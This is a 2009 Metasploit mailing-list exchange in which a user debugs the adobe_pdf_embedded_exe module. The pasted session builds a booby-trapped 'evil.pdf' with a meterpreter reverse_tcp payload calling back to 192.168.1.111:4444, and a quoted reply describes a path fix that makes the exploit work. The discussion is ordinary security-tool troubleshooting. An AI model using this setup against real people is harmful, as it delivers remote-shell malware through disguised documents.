Metasploit mailing list archives
Small fix in adobe_pdf_embedded_exe.rb
From: jeffs at speakeasy.net (Jeffs)
Date: Wed, 26 Aug 2009 00:05:45 -0400
Thank you for the patch, Danilo. I applied it, but when I run the 'sploit this is what I get in Windows XP SP3 in a pop-up box. See my session results here. I would appreciate any help you can offer. Thanks.

======================================================
c:\windows\system32\cmd.exe: The system cannot find the file specified

and in a separate box:

Windows cannot find cigar.exe. Make sure you type the name correctly and try again.
=========================================================

And here is the output of my metasploit session for creating the 'sploit:

Module options:

   Name        Current Setting           Required  Description
   ----        ---------------           --------  -----------
   EXENAME     /home/bagside/calc.exe    no        The Name of payload exe.
   FILENAME    evil.pdf                  no        The output filename.
   INFILENAME  /home/bagside/cigar.pdf   no        The Input PDF filename.
   OUTPUTPATH  ./data/exploits/          no        The location to output the file.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.111    yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)

msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in '/home/bagside/cigar.pdf'...
[*] Parseing '/home/bagside/cigar.pdf'...
[*] Parseing Successfull.
[*] Using '/home/bagside/calc.exe' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /tools/exploits/trunk/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >

Danilo Nascimento wrote:
I was playing with adobe_pdf_embedded_exe.rb in Win 7 and I got an error "Windows cannot find 'c:\\windows\system32\cmd.exe'". Changed to "c:\" and it works fine.

BTW, why is this module an exploit? I think this exploit should be moved to an auxiliary module. Is there any way to use the FILEFORMAT class in an auxiliary module?

[]'s
Danilo Nascimento